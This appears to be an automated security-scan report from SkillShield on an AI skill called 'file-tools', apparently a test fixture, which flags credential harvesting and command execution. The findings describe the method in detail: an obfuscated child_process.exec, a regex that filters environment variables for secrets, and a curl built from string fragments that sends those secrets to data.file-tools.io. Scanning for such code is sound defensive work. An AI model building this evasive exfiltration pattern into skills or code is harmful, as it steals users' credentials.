Trust Assessment
file-tools received a trust score of 20/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 5 findings: 4 critical, 1 high, 0 medium, and 0 low severity. Key findings include Unsafe environment variable passthrough, Credential harvesting, Obfuscated Command Injection via child_process.exec.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 10/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings5
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Credential harvesting Bulk environment variable dump Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/c-goro/skillguard/test-fixtures/evasive-05-alias-chain/tools.js:14 | |
| CRITICAL | Obfuscated Command Injection via child_process.exec The skill dynamically loads the `child_process` module using string concatenation (`['child', 'process'].join('_')`) to evade static analysis. It then aliases `child_process.exec` to `doTask` and uses it to execute arbitrary commands constructed from string parts (`['cur', 'l ', '-s ', 'htt', 'ps://', 'dat', 'a.fi', 'le-too', 'ls.io']`). This allows for arbitrary command execution on the host system, indicating a severe command injection vulnerability. Remove all code that dynamically loads or executes `child_process` functions. Implement strict sandboxing and allow-listing for external process execution to prevent arbitrary command execution. | LLM | tools.js:19 | |
| CRITICAL | Environment Variable Credential Harvesting The skill iterates through all environment variables (`process.env`) and filters them using a regular expression (`/key|secret|token|pass|cred|auth/i`) to identify and collect sensitive credentials such as API keys, secrets, tokens, passwords, and authentication details. This is a direct attempt to harvest credentials from the host environment. Remove all code that accesses or filters `process.env` for sensitive information. Skills should not have direct access to host environment variables, especially for harvesting purposes. | LLM | tools.js:14 | |
| CRITICAL | Exfiltration of Harvested Credentials The skill constructs a `curl` command using dynamically assembled parts (`['cur', 'l ', '-s ', 'htt', 'ps://', 'dat', 'a.fi', 'le-too', 'ls.io']`) and then uses `child_process.exec` (aliased as `doTask`) to send harvested sensitive environment variables (keys and values) to an external domain (`https://data.file-tools.io`). This constitutes a direct and deliberate data exfiltration attempt. Remove all code responsible for constructing and executing external network requests to send sensitive data. Implement network egress filtering and prevent skills from making unauthorized external connections. | LLM | tools.js:18 | |
| HIGH | Unsafe environment variable passthrough Bulk environment variable harvesting Minimize environment variable exposure. Only pass required, non-sensitive variables to MCP servers. Use dedicated secret management instead of environment passthrough. | Manifest | skills/c-goro/skillguard/test-fixtures/evasive-05-alias-chain/tools.js:14 |
Scan History
Embed Code
[](https://skillshield.io/report/47ac30ec68ce402f)
Powered by SkillShield